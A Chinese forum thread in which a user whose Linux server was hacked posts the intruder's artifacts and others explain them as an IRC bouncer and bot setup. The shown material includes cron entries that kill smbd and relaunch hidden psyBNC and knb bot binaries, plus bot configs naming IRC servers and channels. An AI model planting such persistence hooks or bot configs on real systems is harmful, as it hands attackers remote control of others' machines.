我的机子被人黑了.大家看看他想要做什么?

lylzgq

[root@xxx scripts]# crontab -l
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.8367 installed on Thu Aug 24 15:47:45 2006)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/10 * * * * killall -9 smbd >/dev/null 2>&1
*/10 * * * * /var/tmp/.../tmp/psybncchk >/dev/null 2>&1
*/10 * * * * cd /var/tmp/.../knb; ./knb tw >/dev/null 2>&1
-------------------------------------------------------------------------------
[root@xxx tmp]# cd /var/tmp/.../tmp/
[root@xxx tmp]# dir
CHANGES          bash             makesalt         psybncchk
COPYING          config.h         menuconf         salt.h
FAQ              help             motd             scripts
Makefile         key              psybnc.conf      src
README           lang             psybnc.conf.old  targets.mak
SCRIPTING        log              psybnc.md5sum    tools
TODO             makefile.out     psybnc.pid
[root@xxx tmp]# cd /var/tmp/.../knb
[root@xxx tmp]#dir
CHANGELOG        conf             knb_bro.uf       tw
README           knb              pid.knb_bro
cfg-examples     knb-0.2.1-linux  scripts

-------------------------------------------------------------------------------
[root@xxx knb]# cat  /var/tmp/.../tmp/psybncchk#!/bin/sh
# This is the crontab script for psybnc.
#
# Please change the following path to your psybnc-directory.

PSYBNCPATH=/var/tmp/.../tmp

# the rest should be kept as is

if test -r $PSYBNCPATH/psybnc.pid; then
    PSYPID=$(cat $PSYBNCPATH/psybnc.pid)
    if $(kill -CHLD $PSYPID >/dev/null 2>&1)
    then
        exit 0
    fi
fi
cd $PSYBNCPATH
./bash &>/dev/null
--------------------------------------------------------------------------

[root@xxx knb]# cat  /var/tmp/.../knb/tw
nick knb_bro
realname Bro.
;logfile Knb.log
nicks a b c d e f g h i j k l m n o p q r s t u w v x y z
channel #gtw
ident open
server 139.175.239.20 6667
server 203.204.205.222 6667
------------------------------------------------
[root@xxx knb]# cat /var/tmp/.../knb/conf
nick Knb
realname Need Knb? Go to http://hoth.amu.edu.pl/~esio/c
;logfile Knb.log
nicks a b c d e f g h i j k l m n o p q r s t u w v x y z
channel #Knb
server lublin.irc.pl 7776
server warszawa.irc.pl 6667
server poznan.irc.pl 6667

大家还想看什么文件,我再贴......帮我看下他在实现一个什么功能?

testab

实现一个irc服务器.
  某些蠕虫连接到irc服务器,接受攻击其他服务器的指令,发垃圾邮件等等...

lylzgq

也就是用我的机子为跳板。向其他机子发垃圾信息？

testab

原帖由 lylzgq 于 2006-8-24 22:55 发表
也就是用我的机子为跳板。向其他机子发垃圾信息？

否.
受害机器连接到你的机器 接收控制指令

PCOS

建议本站加个免费杀毒区！我的机器这几天都有中毒木马这个现象！希望路过的大侠帮我搞下!

testab

原帖由 PCOS 于 2006-8-28 00:51 发表
建议本站加个免费杀毒区！我的机器这几天都有中毒木马这个现象！希望路过的大侠帮我搞下!

杀一般的病毒纯是体力活，很高级的病毒需要真功夫。

与雨相随

他想建一个psybnc，从表面上就这样......然后想搞个BOT.........

langue

先断开sshd；从iptables上关掉端口，再慢慢解决问题。